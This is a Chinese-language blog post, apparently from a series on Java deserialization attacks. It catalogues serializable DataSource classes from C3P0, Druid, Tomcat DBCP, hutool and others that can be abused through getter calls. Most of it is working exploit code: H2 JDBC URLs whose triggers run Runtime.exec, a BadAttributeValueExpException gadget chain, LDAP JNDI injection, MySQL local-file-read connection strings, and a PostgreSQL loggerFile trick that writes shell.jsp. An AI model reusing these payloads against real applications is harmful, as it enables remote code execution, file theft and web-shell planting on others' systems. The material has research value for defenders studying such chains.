getter篇

除了TemplatesImpl哪些getter可以造成危害，我之前的文章提到过很多了，其中DataSource.getConnection()+H2是比较常用的RCE手段。所以主要是找DataSource类，以下是我收集的一些同时实现DataSource和Serializable的类，可以用来转jdbc。

C3P0依赖

com.mchange.v2.c3p0.DriverManagerDataSource 
com.mchange.v1.db.sql.DriverManagerDataSource
com.mchange.v2.c3p0.test.FreezableDriverManagerDataSource
com.mchange.v2.c3p0.ComboPooledDataSource

mchange-commons-java依赖

com.mchange.v2.naming.ReferenceIndirector$ReferenceSerialized

Druid依赖

com.alibaba.druid.pool.xa.DruidXADataSource
com.alibaba.druid.pool.DruidDataSource

hibernate-core-4.x依赖

org.hibernate.service.jdbc.connections.internal.DriverManagerConnectionProviderImpl

weblogic/oracle依赖

oracle.ucp.jdbc.PoolDataSourceImpl

tomcat依赖

org.apache.tomcat.dbcp.dbcp.cpdsadapter.DriverAdapterCPDS 
org.apache.tomcat.dbcp.dbcp2.cpdsadapter.DriverAdapterCPDS
org.apache.commons.dbcp.cpdsadapter.DriverAdapterCPDS
org.apache.commons.dbcp2.cpdsadapter.DriverAdapterCPDS

hutool依赖

cn.hutool.db.ds.pooled.PooledDSFactory
cn.hutool.db.ds.simple.SimpleDSFactory
cn.hutool.db.ds.c3p0.C3p0DSFactory
cn.hutool.db.ds.dbcp.DbcpDSFactory
cn.hutool.db.ds.druid.DruidDSFactory
cn.hutool.db.ds.hikari.HikariDSFactory
cn.hutool.db.ds.jndi.JndiDSFactory
cn.hutool.db.ds.tomcat.TomcatDSFactory

其中ComboPooledDataSource/C3p0DSFactory会无限尝试连接，可能导致拒绝服务，慎用。

DruidXADataSource无法跟fastjson配合，getter顺序有问题，会先进入DruidAbstractDataSource.getCompositeData报空指针，而dataSourceStat没实现序列化。只能参与fastjson2/jackson链。

同理DruidDataSource无法跟fastjson/fastjson2配合，只能参与jackson链。

以DruidXADataSource和DriverAdapterCPDS为例

     DruidXADataSource ds = new DruidXADataSource();
     ds.setDriverClassName("org.h2.Driver");
     String JDBC_URL = "jdbc:h2:mem:test;MODE=MSSQLServer;init=CREATE TRIGGER shell3 BEFORE SELECT ON\n" +
             "INFORMATION_SCHEMA.TABLES AS $$//javascript\n" +
             "java.lang.Runtime.getRuntime().exec('calc')\n" +
             "$$\n";
     ds.setUrl(JDBC_URL);
     ds.setStatLogger(null);
     ds.setLogWriter(null);
     Reflections.setFieldValue(ds, "transactionHistogram", null);
     Reflections.setFieldValue(ds, "initedLatch", null);
     ds.setInitialSize(2);

     JSONArray jsonArray = new JSONArray();
     jsonArray.add(ds);
     //jsonArray.toString();

     BadAttributeValueExpException val = new BadAttributeValueExpException(null);
     Reflections.setFieldValue(bd,"val",jsonArray);

DriverAdapterCPDS dac = new DriverAdapterCPDS();
     String JDBC_URL = "jdbc:h2:mem:test;MODE=MSSQLServer;init=CREATE TRIGGER shell3 BEFORE SELECT ON\n" +
             "INFORMATION_SCHEMA.TABLES AS $$//javascript\n" +
             "java.lang.Runtime.getRuntime().exec('calc')\n" +
             "$$\n";
     dac.setUrl(JDBC_URL);
     dac.setDriver("org.h2.Driver");
     InstanceKeyDataSource dbs = new SharedPoolDataSource();
     //dbs = new PerUserPoolDataSource();
     dbs.setConnectionPoolDataSource(dac);
     //dbs.getConnection();

除此之外，其他常用的存在一定危害的getter如下。

        Constructor<?> ctor = Class.forName("com.sun.jndi.ldap.LdapAttribute").getDeclaredConstructor(new Class<?>[]{String.class});
        ctor.setAccessible(true);
        javax.naming.directory.Attribute obj = (javax.naming.directory.Attribute) ctor.newInstance("id");
        Reflections.setFieldValue(obj, "baseCtxURL", "ldap://127.0.0.1:1389");
        Reflections.setFieldValue(obj, "rdn", new CompositeName("exp"));
        //obj.getAttributeDefinition();

        KeyPairGenerator kpg = KeyPairGenerator.getInstance("DSA");
        kpg.initialize(1024);
        KeyPair kp = kpg.generateKeyPair();
        SignedObject signedObject = new SignedObject(queue,kp.getPrivate(), java.security.Signature.getInstance("DSA"));
        //signedObject.getObject();

  MysqlDataSource mds = new MysqlDataSource();
  //mds = new MysqlConnectionPoolDataSource();
  mds.setUrl("jdbc:mysql://127.0.0.1:3307/test?allowLoadLocalInfile=true&allowUrlInLocalInfile=true&maxAllowedPacket=655360");
  mds.setPassword("123456");
  mds.setUser("win_ini");
  //mds.getConnection();

  oracle.jdbc.datasource.impl.OracleDataSource ods = new oracle.jdbc.datasource.impl.OracleDataSource();
  ods.setURL("jdbc:oracle:thin:@//127.0.0.1:1521/orcl");
  ods.setUser("system");
  ods.setPassword("123456");
  //ods.getConnection();

     InstanceKeyDataSource dbs = new SharedPoolDataSource();
     //dbs = new PerUserPoolDataSource();
     dbs.setDataSourceName("ldap://127.0.0.1:1389/test");
     //dbs.getConnection();

  PGConnectionPoolDataSource ods = new PGConnectionPoolDataSource();
  ods.setURL("jdbc:postgresql://127.0.0.1:52791/test?loggerLevel=TRACE&loggerFile=shell.jsp");
  ods.setUser("root");
  ods.setPassword("123456");
  //ods.getConnection();

  PGSimpleDataSource ods = new PGSimpleDataSource();
  ods.setURL("jdbc:postgresql://127.0.0.1:52791/test?loggerLevel=TRACE&loggerFile=shell.jsp");
  ods.setUser("root");
  ods.setPassword("123456");
  //ods.getConnection();